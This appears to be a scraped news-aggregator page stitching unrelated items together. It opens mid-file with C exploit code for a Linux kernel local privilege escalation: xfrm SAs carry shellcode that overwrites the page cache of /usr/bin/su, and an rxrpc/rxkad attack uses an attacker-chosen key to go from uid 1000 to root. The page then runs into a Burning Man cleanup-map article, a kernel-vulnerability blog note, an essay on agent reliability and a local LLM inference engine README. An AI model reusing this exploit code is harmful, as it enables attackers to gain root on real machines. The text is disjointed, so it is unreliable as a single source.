static int verify_byte(const char *path, off_t offset, uint8_t want) { int fd = open(path, O_RDONLY); if (fd < 0) return -1; uint8_t got; if (pread(fd, &got, 1, offset) != 1) { close(fd); return -1; } close(fd); return got == want ? 0 : -1; }

static int corrupt_su(void) { setup_userns_netns(); usleep(100 * 1000);

/* Install 40 xfrm SAs, one per 4-byte chunk. Each carries the * desired payload word in its seq_hi ﬁeld. */ for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uint32_t spi = 0xDEADBE10 + i; uint32_t seqhi = ((uint32_t)shell_elf[i*4 + 0] << 24) | ((uint32_t)shell_elf[i*4 + 1] << 16) | ((uint32_t)shell_elf[i*4 + 2] << 8) | ((uint32_t)shell_elf[i*4 + 3]); if (add_xfrm_sa(spi, seqhi) < 0) { SLOG(“add_xfrm_sa #%d failed”, i); return -1; } } SLOG(“installed %d xfrm SAs”, PAYLOAD_LEN / 4);

for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uint32_t spi = 0xDEADBE10 + i; off_t off = PATCH_OFFSET + i * 4; if (do_one_write(TARGET_PATH, off, spi) < 0) { SLOG(“do_one_write #%d at off=0x%lx failed”, i, (long)off); return -1; } } SLOG(“wrote %d bytes to %s starting at 0x%x”, PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET); return 0; }

int su_lpe_main(int argc, char **argv) { for (int i = 1; i < argc; i++) { if (!strcmp(argv[i], “-v”) || !strcmp(argv[i], “–verbose”)) g_su_verbose = 1; else if (!strcmp(argv[i], “–corrupt-only”)) ; /* compat: this body always corrupts only */ } if (getenv(“DIRTYFRAG_VERBOSE”)) g_su_verbose = 1;

pid_t cpid = fork(); if (cpid < 0) return 1; if (cpid == 0) { int rc = corrupt_su(); _exit(rc == 0 ? 0 : 2); } int cstatus; waitpid(cpid, &cstatus, 0); if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) { SLOG(“corruption stage failed (status=0x%x)”, cstatus); return 1; }

/* Sanity check: bytes at the embedded ELF entry (ﬁle offset 0x78 * after our overwrite) should be 0x31 0xff (xor edi, edi — ﬁrst * instruction of the new shellcode). */ if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 || verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) { SLOG(“post-write verify failed (target unchanged)“); return 1; } SLOG(“/usr/bin/su page-cache patched (entry 0x%x = shellcode)”, ENTRY_OFFSET); return 0; } /* * rxrpc/rxkad LPE — uid=1000 → root */

#deﬁne _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <stdarg.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <time.h> #include <sched.h> #include <poll.h> #include <signal.h> #include <sys/wait.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/uio.h> #include <sys/types.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/rxrpc.h> #include <linux/keyctl.h> #include <linux/if_alg.h> #include <net/if.h> #include <termios.h>

#ifndef AF_RXRPC #deﬁne AF_RXRPC 33 #endif #ifndef PF_RXRPC #deﬁne PF_RXRPC AF_RXRPC #endif #ifndef SOL_RXRPC #deﬁne SOL_RXRPC 272 #endif #ifndef SOL_ALG #deﬁne SOL_ALG 279 #endif #ifndef AF_ALG #deﬁne AF_ALG 38 #endif #ifndef MSG_SPLICE_PAGES #deﬁne MSG_SPLICE_PAGES 0x8000000 #endif

/* –– rxrpc constants –– */ #deﬁne RXRPC_PACKET_TYPE_DATA 1 #deﬁne RXRPC_PACKET_TYPE_ACK 2 #deﬁne RXRPC_PACKET_TYPE_ABORT 4 #deﬁne RXRPC_PACKET_TYPE_CHALLENGE 6 #deﬁne RXRPC_PACKET_TYPE_RESPONSE 7 #deﬁne RXRPC_CLIENT_INITIATED 0x01 #deﬁne RXRPC_REQUEST_ACK 0x02 #deﬁne RXRPC_LAST_PACKET 0x04 #deﬁne RXRPC_CHANNELMASK 3 #deﬁne RXRPC_CIDSHIFT 2

struct rxrpc_wire_header { uint32_t epoch; uint32_t cid; uint32_t callNumber; uint32_t seq; uint32_t serial; uint8_t type; uint8_t ﬂags; uint8_t userStatus; uint8_t securityIndex; uint16_t cksum; /* big-endian on wire */ uint16_t serviceId; } __attribute__((packed));

struct rxkad_challenge { uint32_t version; uint32_t nonce; uint32_t min_level; uint32_t __padding; } __attribute__((packed));

/* Attacker-chosen 8-byte session key used for the rxkad token. * Mutable because the LPE brute-force iterates over keys looking for * one that decrypts the ﬁle’s UID ﬁeld to a “0:” preﬁx. */ static uint8_t SESSION_KEY[8] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08 };

#deﬁne LOG(fmt, …) fprintf(stderr, “[+] ” fmt “\n”, ##__VA_ARGS__) #deﬁne WARN(fmt, …) fprintf(stderr, “[!] ” fmt “\n”, ##__VA_ARGS__) #deﬁne DBG(fmt, …) fprintf(stderr, “[.] ” fmt “\n”, ##__VA_ARGS__)

/* =================================================================== */ /* unshare + map setup */ /* =================================================================== */

static int write_ﬁle(const char *path, const char *fmt, …) { int fd = open(path, O_WRONLY); if (fd < 0) return -1; char buf[256]; va_list ap; va_start(ap, fmt); int n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); int r = (int)write(fd, buf, n); close(fd); return r; }

static int do_unshare_userns_netns(void) { uid_t real_uid = getuid(); gid_t real_gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { WARN(“unshare(NEWUSER|NEWNET): %s”, strerror(errno)); return -1; } LOG(“unshare(USER|NET) OK, real uid=%u”, real_uid); write_ﬁle(“/proc/self/setgroups”, “deny”); if (write_ﬁle(“/proc/self/uid_map”, “%u %u 1″, real_uid, real_uid) < 0) { WARN(“uid_map: %s”, strerror(errno)); return -1; } if (write_ﬁle(“/proc/self/gid_map”, “%u %u 1”, real_gid, real_gid) < 0) { WARN(“gid_map: %s”, strerror(errno)); return -1; } LOG(“uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns”, real_uid, real_gid);

/* ifup lo */ int s = socket(AF_INET, SOCK_DGRAM, 0); if (s >= 0) { struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, “lo”); if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { ifr.ifr_ﬂags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) WARN(“SIOCSIFFLAGS lo: %s”, strerror(errno)); else LOG(“lo brought UP in new netns”); } close(s); } return 0; }

/* =================================================================== */ /* rxrpc key (rxkad v1 token with attacker session key) */ /* =================================================================== */

static long key_add(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(SYS_add_key, type, desc, payload, plen, ringid); }

static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen) { uint8_t *p = out; uint32_t now = (uint32_t)time(NULL); uint32_t expires = now + 86400; *(uint32_t *)p = htonl(0); p += 4; /* ﬂags */ const char *cell = “evil”; uint32_t clen = strlen(cell); *(uint32_t *)p = htonl(clen); p += 4; memcpy(p, cell, clen); uint32_t pad = (4 - (clen & 3)) & 3; memset(p + clen, 0, pad); p += clen + pad; *(uint32_t *)p = htonl(1); p += 4; /* ntoken */ uint8_t *toklen_p = p; p += 4; uint8_t *tokstart = p; *(uint32_t *)p = htonl(2); p += 4; /* sec_ix = RXKAD */ *(uint32_t *)p = htonl(0); p += 4; /* vice_id */ *(uint32_t *)p = htonl(1); p += 4; /* kvno */ memcpy(p, SESSION_KEY, 8); p += 8; /* session_key K */ *(uint32_t *)p = htonl(now); p += 4; *(uint32_t *)p = htonl(expires); p += 4; *(uint32_t *)p = htonl(1); p += 4; /* primary_ﬂag */ *(uint32_t *)p = htonl(8); p += 4; /* ticket_len */ memset(p, 0xCC, 8); p += 8; /* ticket */ uint32_t toklen = (uint32_t)(p - tokstart); *(uint32_t *)toklen_p = htonl(toklen); if ((size_t)(p - out) > maxlen) { errno = E2BIG; return -1; } return (int)(p - out); }

static long add_rxrpc_key(const char *desc) { uint8_t buf[512]; int n = build_rxrpc_v1_token(buf, sizeof(buf)); if (n < 0) return -1; return key_add(“rxrpc”, desc, buf, n, KEY_SPEC_PROCESS_KEYRING); }

/* =================================================================== */ /* AF_ALG pcbc(fcrypt) helpers */ /* =================================================================== */

static int alg_open_pcbc_fcrypt(const uint8_t key[8]) { int s = socket(AF_ALG, SOCK_SEQPACKET, 0); if (s < 0) { WARN(“socket(AF_ALG): %s”, strerror(errno)); return -1; } struct sockaddr_alg sa = { .salg_family = AF_ALG }; strcpy((char *)sa.salg_type, “skcipher”); strcpy((char *)sa.salg_name, “pcbc(fcrypt)“); if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { WARN(“bind(AF_ALG pcbc(fcrypt)): %s”, strerror(errno)); close(s); return -1; } if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) { WARN(“ALG_SET_KEY: %s”, strerror(errno)); close(s); return -1; } return s; }

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */ static int alg_op(int alg_s, int op, const uint8_t iv[8], const void *in, size_t inlen, void *out) { int op_fd = accept(alg_s, NULL, NULL); if (op_fd < 0) { WARN(“accept(AF_ALG): %s”, strerror(errno)); return -1; }

char cbuf[CMSG_SPACE(sizeof(int)) + CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0}; struct msghdr msg = {0}; msg.msg_control = cbuf; msg.msg_controllen = sizeof(cbuf);

struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int)); *(int *)CMSG_DATA(c) = op;

c = CMSG_NXTHDR(&msg, c); c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_IV; c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8); struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c); aiv->ivlen = 8; memcpy(aiv->iv, iv, 8);

struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen }; msg.msg_iov = &iov; msg.msg_iovlen = 1;

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The map that keeps Burning Man honest

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At the end of April, I ran a short campaign to ﬁnd 15 more paying members of Not-Ship. And we did it! Thank you to the wonderful souls who chose to back this work. It means the world to me.

💙 Amanda

Each year, 70,000 people gather on a dry lakebed in Nevada to build a city from scratch. This is Black Rock City, home to the infamous Burning Man event. Eight days later, it’s gone.

But 150 people remain. They line up — side by side, an arms width apart — and slowly walk the 3,800 acres (15.4 km²) of dusty playa. They’re looking for MOOP: Matter Out of Place. A screw, a sequin, a cigarette butt.

This forensic-style sweep takes weeks; everything they ﬁnd is removed and logged. At the end, they’re left with a remarkable accounting of what 70,000 people left behind: The MOOP Map. And I’m obsessed.

The Burning Man 2025 MOOP Map

Indicates effort and time spent on MOOP cleanup across Black Rock City.

The map is colour-coded by severity of cleanup. Yellow indicates moderate MOOP conditions, where crews slow their pace to make sure nothing is missed. Red are the zones most heavily affected — difﬁcult enough to stop progress entirely.

“In simple terms, the MOOPier an area is, the more labour and ﬁeld time it takes to clean until crews are no longer ﬁnding debris,” Dominic Tinio, who goes by DA, explained to me. As Burning Man’s Environmental Restoration Manager, he’s in charge of the MOOP process.

The future of the community depends on getting this right. Black Rock City is only allowed to return to the playa each year if it passes a strict post-event inspection from the Bureau of Land Management (BLM): No more than one square foot of debris can remain per acre (0.23 m²/ha).

Average yearly debris found by the MOOP, 2006 to 2025

The BLM tests the playa at 120 points across the site; no more than 12 can exceed the one square foot per acre limit. In most years, Burning Man passes comfortably — but not always. In 2023, 11 of those 120 tests came back over the threshold, the closest the event has come to failing in recent memory.

During cleanup, the MOOP team also documents what kind of debris they ﬁnd. In 2025, lag bolts were by far the biggest problem. They anchor tents, art pieces, and other infrastructure into the ground, and can easily disappear beneath the dust.

Lots of lag bolts, not many cigarette butts

Types of debris found during the 2025 MOOP.

Since the MOOP is so meticulous, the team can determine whether debris problems are widespread or isolated. For lag bolts? There’s no main culprit; everyone is just missing a few.

“The MOOP Map is about shared responsibility in our use of the land,” said DA. In addition to helping uphold the BLM standards, it “helps participants, camps, and art projects understand their impact.”

Groups in MOOP-heavy areas receive a breakdown of what was found on their footprint, with the hope they will improve the following year. Persistent or serious offenders are ﬂagged to the team responsible for assigning camps their future spots in Black Rock City.

And while it’s not the MOOP Map’s aim, its release inevitably fuels a bit of public ﬁnger-pointing. The “MOOP Map shame thread” on Reddit calls out individual camps that perform poorly.

The MOOP Map has been around for two decades. Over that time, the data show a relatively clear picture. “Since 2006, over the long arc of the MOOP Map, the most striking trend is that the community has steadily improved at Leave No Trace, even as Black Rock City has grown dramatically in size, complexity, and population,” says DA.

MOOP per person peaked in 2010

Debris per 10,000 people, 2006 to 2025.

Leave No Trace is one of Burning Man’s ten guiding principles. Principles are easy to declare. But the MOOP Map makes it something the community actually has to face. After 20 years, DA is conﬁdent it’s working.

“The strongest effect of the MOOP Map is that it drives improvement. Year after year, the community adjusts, learns, and returns better prepared to leave no trace.”

KEEP ON KEEPING ON

While the Not-Ship member drive is over (for now), this work continues to run on reader support. But after two weeks of writing “pay if you love this work” emails, I’m tired. All my pitches have been pitched. So I’ll just leave the button here, and trust you know what to do with it.

FROM ELSEWHERE

Here’s what I found interesting, important or delightful this week:

Marblelous music. Wintergatan is a quirky instrument that relies heavily on marbles to make music. It’s beautiful to watch, and doesn’t sound anything like you expect.

The inﬁnite buffalo sentence. It’s a grammatically correct sentence, using just the word buffalo. The video explanation beneﬁts from some useful visuals, but you’ll still probably hate this. Or absolutely love it. There’s definitely no middle ground here.

MORE NOT-SHIP

Banks are funding climate chaos. You don’t have to.

Switching banks could be one of the most climate-friendly decisions you make.

Not-ShipAmanda Shendruk

When do most people have the day off?

It’s not the day you think.

Not-ShipAmanda Shendruk

Birds might help us get through this

The mental health beneﬁts of “joy watching” are what we need right now.

Not-ShipAmanda Shendruk

Read more Read the original on www.not-ship.com →

Read the original on www.not-ship.com →

Maybe you shouldn't install new software for a bit

xeiaso.net

594 shares · 46 trendiness

Published on 2026 – 05-07, 82 words, 1 minutes to read

Oh boy yet more linux kernel vulns

In the wake of copy.fail, there are more vulnerabilities that have been announced:

Copy Fail 2: Electric Boogaloo

Dirty Frag

Right now would be one of the best times for a supply chain attack via NPM to hit hard.

Outside of Linux kernel patches from your distro, I think it’s probably a good idea to put a moratorium on installing new software for a week or so.

Facts and circumstances may have changed since publication. Please contact me before jumping to conclusions if something seems wrong or unclear.

Tags:

Served by xesite v4 (/app/bin/xesite) with site version c67419ee , source code available here.

Read more Read the original on xeiaso.net →

Read the original on xeiaso.net →

Blocked

old.reddit.com

574 shares · 28 trendiness

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Try logging in or creating an account here to get back to browsing.

If you’re running a script or application, please register or sign in with your developer credentials here. Additionally make sure your User-Agent is not empty and is something unique and descriptive and try again. if you’re supplying an alternate User-Agent string, try changing back to default as that can sometimes result in a block.

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If you think that we’ve incorrectly blocked you or you would like to discuss easier ways to get the data you want, please ﬁle a ticket here.

When contacting us, please include your Reddit account along with the following code:

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agents need control flow, not more prompts

bsuh.bearblog.dev

493 shares · 24 trendiness

brian’s thoughts

Home Blog

07 May, 2026

Thesis: reliable agents tackling complex tasks need deterministic control ﬂow encoded in software, not increasingly elaborate prompt chains

If you’ve ever resorted to MANDATORY or DO NOT SKIP, you’ve hit the ceiling of prompting.

Imagine a programming language where statements are suggestions and functions return “Success” while hallucinating. Reasoning becomes impossible; reliability collapses as complexity grows.

Software scales through recursive composability: systems built from libraries, modules, and functions. It’s code all the way down. Code exposes predictable behavior, enabling local reasoning. Prompt chains lack this property. While useful for narrow tasks, prompts are non-deterministic, weakly speciﬁed, and difﬁcult to verify.

Reliability requires moving logic out of prose and into runtime. We need deterministic scaffolds: explicit state transitions and validation checkpoints that treat the LLM as a component, not the system.

But deterministic orchestration is only half the battle. In a system prone to silent failure, an agent without aggressive error detection is just a fast way to reach the wrong conclusion. Without programmatic veriﬁcation, we are left with three options:

Babysitter: Keep a human in the loop to catch errors before they propagate.

Auditor: Perform exhaustive end-to-end veriﬁcation after the run.

Prayer: Vibe accept the outputs.

Read more Read the original on bsuh.bearblog.dev →

Read the original on bsuh.bearblog.dev →

GitHub - antirez/ds4: DeepSeek 4 Flash local inference engine for Metal

github.com

419 shares · 20 trendiness

ds4.c is a small native inference engine for DeepSeek V4 Flash. It is intentionally narrow: not a generic GGUF runner, not a wrapper around another runtime, and not a framework. The main path is a DeepSeek V4 Flash-speciﬁc Metal graph executor with DS4-speciﬁc loading, prompt rendering, KV state, and server API glue.

This project would not exist without llama.cpp and GGML, make sure to read the acknowledgements section, a big thank you to Georgi Gerganov and all the other contributors.

Now, back at this project. Why we believe DeepSeek v4 Flash to be a pretty special model deserving a stand alone engine? Because after comparing it with powerful smaller dense models, we can report that:

DeepSeek v4 Flash is faster because of less active parameters.

In thinking mode, if you avoid max thinking, it produces a thinking section that is a lot shorter than other models, even 1/5 of other models in many cases, and crucially, the thinking section length is proportional to the problem complexity. This makes DeepSeek v4 Flash usable with thinking enabled when other models are practically impossible to use in the same conditions.

The model features a context window of 1 million tokens.

Being so large, it knows more things if you go sampling at the edge of knowledge. For instance asking about Italian show or political questions soon uncovers that 284B parameters are a lot more than 27B or 35B parameters.

It writes much better English and Italian. It feels a quasi-frontier model.

The KV cache is incredibly compress, allowing long context inference on local computers and on disk KV cache persistence.

It works well with 2-bit quantization, if quantized in a special way (read later). This allows to run it in MacBooks with 128GB of RAM.

We expect DeepSeek to release updated versions of v4 Flash in the future, even better than the current one.

That said, a few important things about this project:

The local inference landscape contains many excellent projects, but new models are released continuously, and the attention immediately gets captured by the next model to implement. This project takes a deliberately narrow bet: one model at a time, ofﬁcial-vector validation (logits obtained with the ofﬁcial implementation), long-context tests, and enough agent integration to know if it really works. The exact model may change as the landscape evolves, but the constraint remains: local inference credible on high end personal machines or Mac Studios, starting from 128GB of memory.

This software is developed with strong assistance from GPT 5.5 and with humans leading the ideas, testing, and debugging. We say this openly because it shaped how the project was built. If you are not happy with AI-developed code, this software is not for you. The acknowledgement below is equally important: this would not exist without llama.cpp and GGML, largely written by hand.

This implementation is based on the idea that compressed KV caches like the one of DeepSeek v4 and the fast SSD disks of modern MacBooks should change our idea that KV cache belongs to RAM. The KV cache It is actually a ﬁrst class disk citizen.

Our vision is that local inference should be a set of three things working well together, out of the box: A) inference engine with HTTP API + B) GGUF specially crafted to run well under a given engine and given assumptions + C) testing and validation with coding agents implementations. This inference engine only runs with the GGUF ﬁles provided. It gets tested against ofﬁcially obtained logits at different context sizes. This project exists because we wanted to make one local model feel ﬁnished end to end, not just runnable. However this is just alpha quality code, so probably we are not still there.

This is Metal-only, may implement CUDA support in the future? Perhaps, but nothing more. The CPU path is only for correctness check, but warning: current macOS versions have a bug in the virtual memory implementation that will crash the kernel if you try to run the CPU code. Remember? Software sucks. I was not possible to ﬁx the CPU inference to avoid crashing, since each time there is to restart the computer, which is not funny. Help us, if you have the guts.

Acknowledgements to llama.cpp and GGML

ds4.c does not link against GGML, but it exists thanks to the path opened by the llama.cpp project and the kernels, quantization formats, GGUF ecosystem, and hard-won engineering knowledge developed there. We are thankful and indebted to llama.cpp and its contributors. Their implementation, kernels, tests, and design choices were an essential reference while building this DeepSeek V4 Flash-speciﬁc inference path. Some source-level pieces are retained or adapted here under the MIT license: GGUF quant layouts and tables, CPU quant/dot logic, and certain Metal kernels. For this reason, and because we are genuinely grateful, we keep the GGML authors copyright notice in our LICENSE ﬁle.

Model Weights

This implementation only works with the DeepSeek V4 Flash GGUFs published for this project. It is not a general GGUF loader, and arbitrary DeepSeek/GGUF ﬁles will not have the tensor layout, quantization mix, metadata, or optional MTP state expected by the engine. The 2 bit quantizations provided here are not a joke: they behave well, work under coding agents, call tools in a reliable way. The 2 bit quants use a very asymmetrical quantization: only the routed MoE experts are quantized, up/gate at IQ2_XXS, down at Q2_K. They are the majority of all the model space: the other components (shared experts, projections, routing) are left untouched to guarantee quality.

Download one main model:

./download_model.sh q2 # 128 GB RAM machines ./download_model.sh q4 # >= 256 GB RAM machines

The script downloads from https://huggingface.co/antirez/deepseek-v4-gguf, stores ﬁles under ./gguf/, resumes partial downloads with curl -C -, and updates ./ds4ﬂash.gguf to point at the selected q2/q4 model. Authentication is optional for public downloads, but –token TOKEN, HF_TOKEN, or the local Hugging Face token cache are used when present.

./download_model.sh mtp fetches the optional speculative decoding support GGUF. It can be used with both q2 and q4, but must be enabled explicitly with –mtp. The current MTP/speculative decoding path is still experimental: it is correctness-gated and currently provides at most a slight speedup, not a meaningful generation-speed win.

Then build:

make

./ds4ﬂash.gguf is the default model path used by both binaries. Pass -m to select another supported GGUF from ./gguf/. Run ./ds4 –help and ./ds4-server –help for the full ﬂag list.

Speed

These are single-run Metal CLI numbers with –ctx 32768, –nothink, greedy decoding, and -n 256. The short prompt is a normal small Italian story prompt. The long prompts exercise chunked preﬁll plus long-context decode. Q4 requires the larger-memory machine class, so M3 Max Q4 numbers are N/A.

CLI

One-shot prompt:

./ds4 -p “Explain Redis streams in one paragraph.”

No -p starts the interactive prompt:

./ds4 ds4>

The interactive CLI is a real multi-turn DS4 chat. It keeps the rendered chat transcript and the live Metal KV checkpoint, so each turn extends the previous conversation. Useful commands are /help, /think, /think-max, /nothink, /ctx N, /read FILE, and /quit. Ctrl+C interrupts the current generation and returns to ds4>.

The CLI defaults to thinking mode. Use /nothink or –nothink for direct answers. –mtp MTP.gguf –mtp-draft 2 enables the optional MTP speculative path; it is useful only for greedy decoding, currently uses a conﬁdence gate (–mtp-margin) to avoid slow partial accepts, and should be treated as an experimental slight-speedup path.

Server

Start a local OpenAI/Anthropic-compatible server:

./ds4-server –ctx 100000 –kv-disk-dir /tmp/ds4-kv –kv-disk-space-mb 8192

The server is Metal-only. It keeps one mutable graph/KV checkpoint in memory, so stateless clients that resend a longer version of the same prompt can reuse the shared preﬁx instead of pre-ﬁlling from token zero.

Request parsing and sockets run in client threads, but inference itself is serialized through one Metal worker. The current server does not batch multiple independent requests together; concurrent requests wait their turn on the single live graph/session.

Supported endpoints:

GET /v1/models

GET /v1/models/deepseek-v4-ﬂash

POST /v1/chat/completions

POST /v1/completions

POST /v1/messages

/v1/chat/completions accepts the usual OpenAI-style messages, max_tokens/max_completion_tokens, temperature, top_p, top_k, min_p, seed, stream, stream_options.include_usage, tools, and tool_choice. Tool schemas are rendered into DeepSeek’s DSML tool format, and generated DSML tool calls are mapped back to OpenAI tool calls.

/v1/messages is the Anthropic-compatible endpoint used by Claude Code style clients. It accepts system, messages, tools, tool_choice, max_tokens, temperature, top_p, top_k, stream, stop_sequences, and thinking controls. Tool uses are returned as Anthropic tool_use blocks.

Both APIs support SSE streaming. In thinking mode, reasoning is streamed in the native API shape instead of being mixed into ﬁnal text.

Minimal OpenAI example:

curl http://127.0.0.1:8000/v1/chat/completions \ -H ‘Content-Type: application/json’ \ -d ‘{ “model”:“deepseek-v4-ﬂash”, “messages”:[{“role”:“user”,“content”:“List three Redis design principles.“}], “stream”:true }’

Agent Client Usage

ds4-server can be used by local coding agents that speak OpenAI-compatible chat completions. Start the server ﬁrst, and set the client context limit no higher than the –ctx value you started the server with:

./ds4-server –ctx 100000 –kv-disk-dir /tmp/ds4-kv –kv-disk-space-mb 8192

You can use larger context and larger cache if you wish. Full context of 1M tokens is going to use more or less 26GB of memory (compressed indexer alone will be like 22GB), so conﬁgure a context which makes sense in your system. With 128GB of RAM you would run the 2-bit quants, which are already 81GB, 26GB are going to be likely too much, so a context window of 100~300k tokens is wiser.

The 384000 output limit below avoids token caps since the model is able to generate very long replies otherwise (up to 384k tokens). The server still stops when the conﬁgured context window is full.

For opencode, add a provider and agent entry to ~/.conﬁg/opencode/opencode.json:

{ “$schema”: “https://opencode.ai/conﬁg.json”, “provider”: { “ds4”: { “name”: “ds4.c (local)”, “npm”: “@ai-sdk/openai-compatible”, “options”: { “baseURL”: “http://127.0.0.1:8000/v1”, “apiKey”: “dsv4-local” }, “models”: { “deepseek-v4-ﬂash”: { “name”: “DeepSeek V4 Flash (ds4.c local)”, “limit”: { “context”: 100000, “output”: 384000 } } } } }, “agent”: { “ds4″: { “description”: “DeepSeek V4 Flash served by local ds4-server”, “model”: “ds4/deepseek-v4-ﬂash”, “temperature”: 0 } } }

For Pi, add a provider to ~/.pi/agent/models.json:

{ “providers”: { “ds4″: { “name”: “ds4.c local”, “baseUrl”: “http://127.0.0.1:8000/v1”, “api”: “openai-completions”, “apiKey”: “dsv4-local”, “compat”: { “supportsStore”: false, “supportsDeveloperRole”: false, “supportsReasoningEffort”: true, “supportsUsageInStreaming”: true, “maxTokensField”: “max_tokens”, “supportsStrictMode”: false, “thinkingFormat”: “deepseek”, “requiresReasoningContentOnAssistantMessages”: true }, “models”: [ { “id”: “deepseek-v4-ﬂash”, “name”: “DeepSeek V4 Flash (ds4.c local)”, “reasoning”: true, “thinkingLevelMap”: { “off”: null, “minimal”: “low”, “low”: “low”, “medium”: “medium”, “high”: “high”, “xhigh”: “xhigh” }, “input”: [“text”], “contextWindow”: 100000, “maxTokens”: 384000, “cost”: { “input”: 0, “output”: 0, “cacheRead”: 0, “cacheWrite”: 0 } } ] } } }

Optionally make it the default Pi model in ~/.pi/agent/settings.json:

{ “defaultProvider”: “ds4″, “defaultModel”: “deepseek-v4-ﬂash” }

For Claude Code, use the Anthropic-compatible endpoint. A wrapper like this matches the local ~/bin/claude-ds4 setup:

#!/bin/sh unset ANTHROPIC_API_KEY

export ANTHROPIC_BASE_URL=“${DS4_ANTHROPIC_BASE_URL:-http://127.0.0.1:8000}” export ANTHROPIC_AUTH_TOKEN=“${DS4_API_KEY:-dsv4-local}” export ANTHROPIC_MODEL=“deepseek-v4-ﬂash”

export ANTHROPIC_CUSTOM_MODEL_OPTION=“deepseek-v4-ﬂash” export ANTHROPIC_CUSTOM_MODEL_OPTION_NAME=“DeepSeek V4 Flash local ds4″ export ANTHROPIC_CUSTOM_MODEL_OPTION_DESCRIPTION=“ds4.c local GGUF”

export ANTHROPIC_DEFAULT_SONNET_MODEL=“deepseek-v4-ﬂash” export ANTHROPIC_DEFAULT_HAIKU_MODEL=“deepseek-v4-ﬂash” export ANTHROPIC_DEFAULT_OPUS_MODEL=“deepseek-v4-ﬂash” export CLAUDE_CODE_SUBAGENT_MODEL=“deepseek-v4-ﬂash”

export CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC=1 export CLAUDE_CODE_DISABLE_NONSTREAMING_FALLBACK=1 export CLAUDE_STREAM_IDLE_TIMEOUT_MS=600000

exec “$HOME/.local/bin/claude” “$@”

Claude Code may send a large initial prompt, often around 25k tokens, before it starts doing useful work. Keep –kv-disk-dir enabled: after the ﬁrst expensive preﬁll, the disk KV cache lets later continuations or restarted sessions reuse the saved preﬁx instead of processing the whole prompt again.

Thinking Modes

DeepSeek V4 Flash has distinct non-thinking, thinking, and Think Max modes. The server defaults to thinking mode. reasoning_effort=max requests Think Max, but it is only applied when the context size is large enough for the model card recommendation; smaller contexts fall back to normal thinking. OpenAI reasoning_effort=xhigh still maps to normal thinking, not Think Max.

For direct replies, use thinking: {“type”:“disabled”}, think:false, or a non-thinking model alias such as deepseek-chat.

Disk KV Cache

Chat/completion APIs are stateless: agent clients usually resend the whole conversation every request. ds4-server handles this by comparing the rendered token stream with cached token preﬁxes. The live in-memory checkpoint covers the current session; the disk KV cache makes useful preﬁxes survive session switches and server restarts.

For RAM reasons there is currently only one live KV cache in memory. When a new unrelated session replaces it, the old checkpoint can only be resumed without re-processing if it was written to the disk KV cache. In other words, memory cache handles the active session; disk cache is the resume mechanism for different sessions.

Enable it with:

./ds4-server –kv-disk-dir /tmp/ds4-kv –kv-disk-space-mb 8192

The cache key is the SHA1 of exact token IDs, not raw text. Each token ID is hashed as a little-endian 32-bit integer, and ﬁles are named <sha1>.kv. The ﬁle is intentionally written with ordinary read/write I/O, not mmap, so restoring cache entries does not add more VM mappings to a process that already maps the model.

On disk, a cache ﬁle is:

KVC ﬁxed header, 48 bytes u32 rendered_text_bytes rendered_text_bytes of UTF-8-ish token text DS4 session payload, payload_bytes from the KVC header

The ﬁxed header is little-endian:

0 u8[3] magic = “KVC” 3 u8 version = 1 4 u8 routed expert quant bits, currently 2 or 4 5 u8 save reason: 0 unknown, 1 cold, 2 continued, 3 evict, 4 shutdown 6 u8[2] reserved 8 u32 cached token count 12 u32 hit count 16 u32 context size the snapshot was written for 20 u8[4] reserved 24 u64 creation Unix time 32 u64 last-used Unix time 40 u64 DS4 session payload byte count

The rendered text is the tokenizer-decoded text for the cached token preﬁx. It is stored only for observability, so humans can inspect a cache directory without decoding token IDs. It is not used as the key and it is not trusted when loading; after load, the stored checkpoint tokens must still match the incoming request preﬁx.

The DS4 session payload starts with thirteen little-endian u32 ﬁelds:

0 magic = “DSV4” 1 payload version = 1 2 saved context size 3 preﬁll chunk size 4 raw KV ring capacity 5 raw sliding-window length 6 compressed KV capacity 7 checkpoint token count 8 layer count 9 raw/head KV dimension 10 indexer head dimension 11 vocabulary size 12 live raw rows serialized below

Then it stores:

u32[token_count] checkpoint token IDs.

ﬂoat32[vocab_size] logits for the next token after that checkpoint.

u32[layer_count] compressed attention row counts.

u32[layer_count] ratio-4 indexer row counts.

For every layer: the live raw sliding-window KV rows, written in logical position order rather than physical ring order.

For compressed layers: live compressed KV rows and compressor frontier tensors.

For ratio-4 compressed layers: live indexer compressed rows and indexer frontier tensors.

